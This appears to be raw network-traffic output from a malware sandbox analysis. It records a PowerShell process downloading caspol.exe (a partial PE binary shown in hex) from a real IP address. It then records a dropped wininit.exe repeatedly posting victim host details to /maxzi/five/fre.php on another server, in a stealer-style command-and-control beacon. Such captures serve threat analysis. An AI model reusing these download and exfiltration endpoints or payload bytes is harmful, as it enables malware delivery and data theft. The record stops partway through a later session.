                                                                                                                              Nov 20, 2024 10:59:01.196244001 CET5884980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:59:01.196295977 CET5884980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:59:01.201970100 CET805884994.156.177.41192.168.2.4
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 20, 2024 10:57:33.821121931 CET5363524162.159.36.2192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:34.294576883 CET6360853192.168.2.41.1.1.1
                                                                                                                              Nov 20, 2024 10:57:34.302139997 CET53636081.1.1.1192.168.2.4
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Nov 20, 2024 10:57:34.294576883 CET192.168.2.41.1.1.10xce69Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Nov 20, 2024 10:57:18.117548943 CET1.1.1.1192.168.2.40xf975No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                              Nov 20, 2024 10:57:18.117548943 CET1.1.1.1192.168.2.40xf975No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                              Nov 20, 2024 10:57:34.302139997 CET1.1.1.1192.168.2.40xce69Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                              • 66.63.187.231
                                                                                                                              • 94.156.177.41
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.44973066.63.187.231806668C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:04.858405113 CET286OUTGET /33/caspol.exe HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: 66.63.187.231
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Nov 20, 2024 10:57:05.600949049 CET1236INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:05 GMT
                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                              Last-Modified: Wed, 20 Nov 2024 01:27:09 GMT
                                                                                                                              ETag: "92a00-6274e0c657f44"
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 600576
                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 3a 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 e6 26 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:=g0 & @@ `&O@|` H.text `.rsrc|@@@.reloc`(@B&H6(^(}{rp o5{o7&*0{o9}&*0to{{rp(o:+%{oo;o&Xi2{o<&{o=*+E\b2{oA*n(}}(*0
                                                                                                                              Nov 20, 2024 10:57:05.601052999 CET1236INData Raw: 00 be 00 00 00 03 00 00 11 02 7b 07 00 00 04 6f 1a 00 00 0a 17 8d 33 00 00 01 25 16 1f 3b 9d 6f 1b 00 00 0a 0a 02 7b 09 00 00 04 6f 1a 00 00 0a 0b 73 1c 00 00 0a 0c 02 7b 03 00 00 04 06 07 08 6f 03 00 00 06 2c 69 72 35 00 00 70 0d 08 6f 1d 00 00
                                                                                                                              Data Ascii: {o3%;o{os{o,ir5po+(r5p(( -o!r9p(("&{o#{o#+rap("&&(*L$p.0#{
                                                                                                                              Nov 20, 2024 10:57:05.601090908 CET1236INData Raw: 00 00 0a 02 7b 0b 00 00 04 1e 1d 1e 1d 73 32 00 00 0a 6f 33 00 00 0a 02 7b 0b 00 00 04 72 b9 01 00 70 6f 34 00 00 0a 02 7b 0b 00 00 04 20 c8 00 00 00 1f 37 73 35 00 00 0a 6f 36 00 00 0a 02 7b 0b 00 00 04 1b 6f 37 00 00 0a 02 7b 0b 00 00 04 72 d3
                                                                                                                              Data Ascii: {s2o3{rpo4{ 7s5o6{o7{rpo8{o<{s:o="A"As>(?(@ ] s5(A(B{oC(B{oC(B{oC(B{oC
                                                                                                                              Nov 20, 2024 10:57:05.601814985 CET1236INData Raw: 00 1f 20 73 35 00 00 0a 6f 36 00 00 0a 02 7b 11 00 00 04 1b 6f 37 00 00 0a 02 7b 11 00 00 04 72 53 03 00 70 6f 38 00 00 0a 20 2b 23 00 00 28 4f 00 00 0a 06 72 65 03 00 70 6f 44 00 00 0a 75 03 00 00 1b 0b 28 50 00 00 0a 72 6f 03 00 70 6f 51 00 00
                                                                                                                              Data Ascii: s5o6{o7{rSpo8 +#(OrepoDu(PropoQiI((8a_X ]X __`aX _EE(X _{a
                                                                                                                              Nov 20, 2024 10:57:05.601851940 CET896INData Raw: 16 00 00 04 2d 1e 72 27 04 00 70 d0 06 00 00 02 28 29 00 00 0a 6f 62 00 00 0a 73 63 00 00 0a 80 16 00 00 04 7e 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 6a 28 18 00 00 06 72 67 04 00 70 7e 17 00 00 04 6f 64 00 00 0a 74 26 00 00
                                                                                                                              Data Ascii: -r'p()obsc~*~**j(rgp~odt&*j(rp~odt&*j(rp~odt&*j(rp~odt&*j(rp~odt&*~*(e*Vs!(ft*0{
                                                                                                                              Nov 20, 2024 10:57:05.602579117 CET1236INData Raw: 33 00 00 06 02 17 8d 31 00 00 01 25 16 72 5f 05 00 70 a2 28 32 00 00 06 03 17 8d 33 00 00 01 25 16 1f 0a 9d 6f 1b 00 00 0a 73 72 00 00 0a 0a 0b 16 0c 2b 49 07 08 9a 0d 09 16 6f 73 00 00 0a 1f 2e 33 22 06 72 67 05 00 70 6f 74 00 00 0a 26 06 09 6f
                                                                                                                              Data Ascii: 31%r_p(23%osr+Ios.3"rgpot&ot&r5pot&+ot&r5pot&Xi2ourkp((31%rp(2*rwp(31%rp(2*0Grp((3(4
                                                                                                                              Nov 20, 2024 10:57:05.602617025 CET1236INData Raw: 07 12 00 68 08 f3 05 0e 00 ef 02 b0 06 0e 00 9b 03 b0 06 0e 00 99 02 96 07 0e 00 a6 0c e8 0b 06 00 0c 07 55 00 0e 00 d7 06 e8 0b 0e 00 f4 06 3c 0e 06 00 d7 08 7d 0d 0e 00 02 06 87 0b 06 00 6f 05 7d 0d 06 00 be 05 23 07 0a 00 cf 06 5a 0b 06 00 c5
                                                                                                                              Data Ascii: hU<}o}#Z##ZwZZY##gZ>B#Z>ZZx Z#CVt}#3Q
                                                                                                                              Nov 20, 2024 10:57:05.603575945 CET1236INData Raw: 00 10 00 27 00 35 34 00 00 00 00 e6 01 26 0c 06 00 28 00 58 34 00 00 00 00 e6 01 28 0e 0d 03 28 00 ac 34 00 00 00 00 e6 01 7a 08 0d 03 29 00 f8 34 00 00 00 00 e6 01 7f 08 3f 00 2a 00 0b 35 00 00 00 00 e6 01 44 0c 06 00 2a 00 3c 35 00 00 00 00 81
                                                                                                                              Data Ascii: '54&(X4((4z)4?*5D*<5*5,5-,6?.}._?1d?1y}1_1/3J45
                                                                                                                              Nov 20, 2024 10:57:05.603611946 CET1236INData Raw: 08 15 00 99 02 b7 09 c5 00 91 00 c5 05 7e 01 31 02 32 0c 06 00 a1 02 da 0a 85 01 a1 02 55 0c 89 01 a1 02 3f 08 8e 01 c1 01 2f 0e 94 01 21 01 b7 09 9a 01 21 01 14 0c a2 01 49 01 b7 09 06 00 a9 02 53 01 aa 01 51 01 38 01 7d 00 51 01 b7 09 06 00 51
                                                                                                                              Data Ascii: ~12U?/!!ISQ8}QQQiiQAD=qqh?}?FA=YYY#A+1
                                                                                                                              Nov 20, 2024 10:57:05.604146004 CET1236INData Raw: 5f 4e 61 6d 65 00 67 65 74 5f 4d 61 63 68 69 6e 65 4e 61 6d 65 00 43 61 6c 6c 42 79 4e 61 6d 65 00 55 73 65 72 6e 61 6d 65 00 5f 75 73 65 72 6e 61 6d 65 00 73 65 74 5f 4d 75 6c 74 69 6c 69 6e 65 00 43 61 6c 6c 54 79 70 65 00 67 65 74 5f 43 75 6c
                                                                                                                              Data Ascii: _Nameget_MachineNameCallByNameUsername_usernameset_MultilineCallTypeget_Cultureset_CultureresourceCultureCaptureButtonBaseApplicationSettingsBaseTextBoxBaseCheckResponseresponseCloseDisposeAuthenticateEditorBrowsableStatePr
                                                                                                                              Nov 20, 2024 10:57:05.614397049 CET1236INData Raw: 65 74 77 6f 72 6b 53 74 72 65 61 6d 00 53 73 6c 53 74 72 65 61 6d 00 5f 73 73 6c 53 74 72 65 61 6d 00 47 65 74 53 74 72 65 61 6d 00 5f 73 74 72 65 61 6d 00 50 72 6f 67 72 61 6d 00 53 79 73 74 65 6d 00 54 72 69 6d 00 4d 61 69 6c 46 72 6f 6d 00 6d
                                                                                                                              Data Ascii: etworkStreamSslStream_sslStreamGetStream_streamProgramSystemTrimMailFrommailFrom_startupFormresourceManMainAuthLoginset_Marginset_IconApplicationset_LocationSystem.ConfigurationSystem.GlobalizationInteractionSystem.Reflect


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.44973494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:12.800262928 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 176
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:12.808001995 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: 'ckav.rujones142233JONES-PCk0FDD42EE188E931437F4FBE2CPtUyE
                                                                                                                              Nov 20, 2024 10:57:13.563699007 CET185INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:13 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.44973594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:13.752315998 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 176
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:13.757343054 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: 'ckav.rujones142233JONES-PC+0FDD42EE188E931437F4FBE2CHK9oT
                                                                                                                              Nov 20, 2024 10:57:14.904177904 CET185INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:14 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.44973794.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:15.000155926 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:15.026901007 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:15.973125935 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:15 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.44973994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:16.121282101 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:16.128443003 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:16.996128082 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:16 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.44974094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:17.161698103 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:17.172162056 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:17.928177118 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:17 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.44974294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:18.088597059 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:18.095134974 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:18.827666044 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:18 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.44974694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:19.180116892 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:19.188468933 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:19.860785007 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:19 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.44974894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:20.010689020 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:20.015773058 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:20.941595078 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:20 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.44975094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:21.093544006 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:21.098850965 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:21.966209888 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:21 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.44975194.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:22.123733044 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:22.128961086 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:22.899676085 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:22 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.44975294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:23.042582989 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:23.051374912 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:23.803018093 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:23 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.44975394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
